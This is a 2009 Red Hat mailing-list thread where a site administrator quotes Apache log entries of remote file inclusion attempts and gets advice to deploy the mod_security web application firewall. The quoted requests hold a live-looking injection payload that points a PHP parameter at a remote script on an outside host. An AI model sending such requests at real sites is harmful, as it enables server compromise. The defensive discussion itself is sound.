Software, utility, or script to block automatically these cracker attacks
Jose R R
jose.r.r at metztli.com
Wed Aug 5 19:38:23 UTC 2009
> Although I go through my logs fairly often and update my scripts on an regular basis, I still get cracker attacks like the ones sampled
> below:
>
> 222.122.6.62 - - [04/Aug/2009:08:09:52 -0700] "GET /blog/index.php/2008/06/02/os-2-warp-server-for-e-business-wseb-and?blog=4///?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D?
> HTTP/1.1" 400 567 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3;
> i686 Linux; 20020515)"
> 222.122.6.62 - - [04/Aug/2009:08:11:18 -0700] "GET /blog/index.php/2008/06/02///?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D?
> HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
> rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
>
> I would appreciate suggestions to block automatically the above. I am already using Fail2ban and some rules in IP tables. Notwithstanding those above manage to get through.
>
> Thanks in advance for any input.
On Wed, Aug 5, 2009 at 12:14 PM, Daniel
Carrillo<daniel.carrillo at gmail.com> wrote:
[...]
> If you are using Apache, the "authoritative" tool is mod_security, a
> web application firewall.
> With a simple set of rules you can drop this requests.
> Hope this helps.
> On Wed, Aug 5, 2009 at 12:17 PM, Marti, Rob<RJM002 at shsu.edu> wrote:
> http://www.modsecurity.org/
> Apache plugin that will stop most/all of these kinds of attacks. Test it before you enable it because it has
> the potential to stop all kinds oftraffic :)
> Rob Marti
Well, noticing the issues that ESGLinux was experiencing with your
mod_security advice, I was hoping there was something else. On the
other hand, thanks for reiterating the advice --I guess there is no
way around it :-) if I want to keep more secure site(s).
Best Regards and thank you again.
--
Jose R R
http://www.metztli-it.com
---------------------------------------------------------------------------------------------
IBM Lotus Symphony supported on GNU/Linux, Mac OS, and Windows.
---------------------------------------------------------------------------------------------
Daylight Saving Time in USA & Canada starts: Sunday 08 March 2009
---------------------------------------------------------------------------------------------
More information about the redhat-list
mailing list